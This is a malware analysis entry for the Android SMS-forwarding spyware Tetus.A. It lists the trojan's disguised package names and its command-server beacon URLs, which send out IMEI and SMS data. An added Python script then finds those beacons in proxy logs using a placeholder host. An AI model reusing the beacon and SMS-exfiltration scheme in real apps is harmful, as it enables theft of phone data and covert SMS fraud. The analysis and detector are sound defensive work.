Android/Tetus.A!tr.spy

Analysis

Android/Tetus.A!tr.spy is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as a legitimate application such as 'Awesome Jokes' or 'Celeb Stalker'. The malware silently forwards all incoming SMS messages to the attacker's server, and it also tracks the installation of other related applications.


Technical Details


The malware comes in packages such as "com.droidmojo.awesomejokes", "com.droidmojo.celebstalker" and "com.appengines.fastphone" (see Fig1, 2 and 3).

Fig1 : Awesome Jokes application icon

Fig2 : Celeb Stalker application icon

Fig3 : Faster Phone application icon

When launched, the application shows a screen corresponding to the application it claims to be.
Once the application page is loaded, the malware registers with a remote website by sending an HTTP request to
[PKG_URL]/ip.php?market=1&lpn=300&pid=[PID]
 &pm=[Build.MODEL]&vd=[Build.MANUFACTURER]
 &c=[NETWORK_CARRIER]&imei=[IMEI]&firmware=[FIRMWARE_VERSION]
 &sdk=[SDK_NUMBER]&sid=[SID]&cc=[NETWORK_OPERATOR_NAME]
where PKG_URL varies with the application, e.g. hxxp://[REMOVED].droidmojo.net, hxxp://[REMOVED]-finity.net or hxxp://[REMOVED]-engines.com.
The server responds with a JSON object containing several parameters, which are used in particular to send SMS messages.
Next, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID]
 + "&type=message&log=" + [STR]
where
  • IMEI = infected phone's IMEI
  • PID = obtained from the package resources
  • STR = [keyword] ?ucsa=[ucsa]

Then, an SMS is sent to a number [csc] with the content
[keyword] ?ucsa=[ucsa]
where csc, keyword and ucsa are obtained from the JSON response.
Finally, an HTTP request is sent out to
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID]
 + "&type=sms&log=" + [STR]
where
  • IMEI = infected phone's IMEI
  • PID = obtained from the package resources
  • STR = "Unknown", "SMS_sent", "Generic_failure", "No_service", "Null_PDU" or "Radio_off", depending on the result of the SMS sending

Besides HTTP requests, the malware implements an SMS receiver that forwards the message body of incoming SMS messages to the number [csc].
Whenever a new related application is installed, a request containing the list of related installed applications is sent to the attacker's server at
"hxxp://[REMOVED]tulus.com/atp-log.php?imei=" + [IMEI] + "&pid=" + [PID] + "&type=marketreciever&log=" + [INSTALLED_APPS]
A "related" application is one of the following applications:
  • com.droidmojo.awesomejokes
  • com.droidmojo.celebstalker
  • com.appengines.fastphone
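The registration and atp-log.php beacons described above have a fixed shape (a fixed path, a fixed set of query parameters, and a small set of "type" values), which makes them easy to pick out of egress proxy logs. The following Python is an added example written for this page, not Fortinet's code or a signature from its products: it assumes a simple hypothetical proxy-log line layout ("timestamp client-ip method url status"), uses a placeholder host (c2.example.invalid) in place of the redacted domains, and runs the check over a few constructed log lines that mirror the request sequence in the analysis (registration, message log, SMS-result log, marketreciever log) plus one benign request.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Beacon paths and parameters taken from the analysis above.
REGISTRATION_PATH = "/ip.php"
LOG_PATH = "/atp-log.php"
# Values of the "type" parameter seen in atp-log.php requests
# ("marketreciever" is spelled as the analysis reports it).
LOG_TYPES = {"message", "sms", "marketreciever"}

# Assumed proxy-log layout (hypothetical, not a real product format):
# "<timestamp> <client-ip> <method> <url> <status>"
PROXY_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)

# Constructed sample lines: c2.example.invalid stands in for the redacted
# domains on the page, and the IMEI, PID and device values are made up.
SAMPLE_PROXY_LINES = [
    "2024-05-01T10:00:01Z 10.0.0.12 GET http://c2.example.invalid/ip.php?market=1&lpn=300&pid=1234&pm=TestModel&vd=TestVendor&c=TestCarrier&imei=356938035643809&firmware=2.3.4&sdk=10&sid=77&cc=TestOperator 200",
    "2024-05-01T10:00:02Z 10.0.0.12 GET http://c2.example.invalid/atp-log.php?imei=356938035643809&pid=1234&type=message&log=JOKES%20?ucsa=42 200",
    "2024-05-01T10:00:03Z 10.0.0.12 GET http://c2.example.invalid/atp-log.php?imei=356938035643809&pid=1234&type=sms&log=SMS_sent 200",
    "2024-05-01T10:05:00Z 10.0.0.12 GET http://c2.example.invalid/atp-log.php?imei=356938035643809&pid=1234&type=marketreciever&log=com.droidmojo.awesomejokes,com.droidmojo.celebstalker 200",
    # Benign request that shares one parameter name but not the beacon shape.
    "2024-05-01T10:06:00Z 10.0.0.13 GET http://www.example.com/index.php?market=1 200",
]


def classify_request(url):
    """Return a detection record if `url` matches one of the beacon shapes, else None."""
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.endswith(REGISTRATION_PATH):
        # Registration: fixed market=1&lpn=300 plus the device-fingerprint fields.
        if (params.get("market") == "1" and params.get("lpn") == "300"
                and {"pid", "imei", "sdk"} <= set(params)):
            return {"kind": "registration", "host": parts.hostname,
                    "imei": params["imei"], "pid": params["pid"]}
    elif parts.path.endswith(LOG_PATH):
        # Log beacon: imei, pid, one of the known type values and a log payload.
        if params.get("type") in LOG_TYPES and {"imei", "pid", "log"} <= set(params):
            return {"kind": "log:" + params["type"], "host": parts.hostname,
                    "imei": params["imei"], "pid": params["pid"], "log": params["log"]}
    return None


def scan_proxy_log(lines):
    """Run classify_request over proxy-log lines and collect the hits in order."""
    hits = []
    for line in lines:
        m = PROXY_LINE.match(line.strip())
        if not m:
            continue  # not in the assumed log layout
        hit = classify_request(m.group("url"))
        if hit is not None:
            hit["client"] = m.group("client")
            hit["ts"] = m.group("ts")
            hits.append(hit)
    return hits


def infected_clients(hits):
    """Map each client IP to the set of beacon kinds it produced, for triage."""
    by_client = {}
    for h in hits:
        by_client.setdefault(h["client"], set()).add(h["kind"])
    return by_client


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LINES):
        print(hit["ts"], hit["client"], hit["kind"], hit.get("log", ""))
    print(infected_clients(scan_proxy_log(SAMPLE_PROXY_LINES)))
```

The match deliberately keys on the path plus parameter set rather than on the hostname, since the analysis shows the registration host varying per package while the atp-log.php host stays the same; a client that produces a registration followed by "log:sms" and "log:marketreciever" beacons has walked the full sequence described above and is worth isolating for the SMS-forwarding behaviour alone.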

Permissions required by the application:
  • INTERNET
  • ACCESS_NETWORK_STATE
  • SEND_SMS
  • READ_PHONE_STATE

Recommended Action

FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

FortiGate: Extended
FortiClient: Extreme
FortiAPS
FortiAPU
FortiMail: Extreme
FortiSandbox: Extreme
FortiWeb: Extreme
Web Application Firewall: Extreme
FortiIsolator: Extreme
FortiDeceptor: Extreme
FortiEDR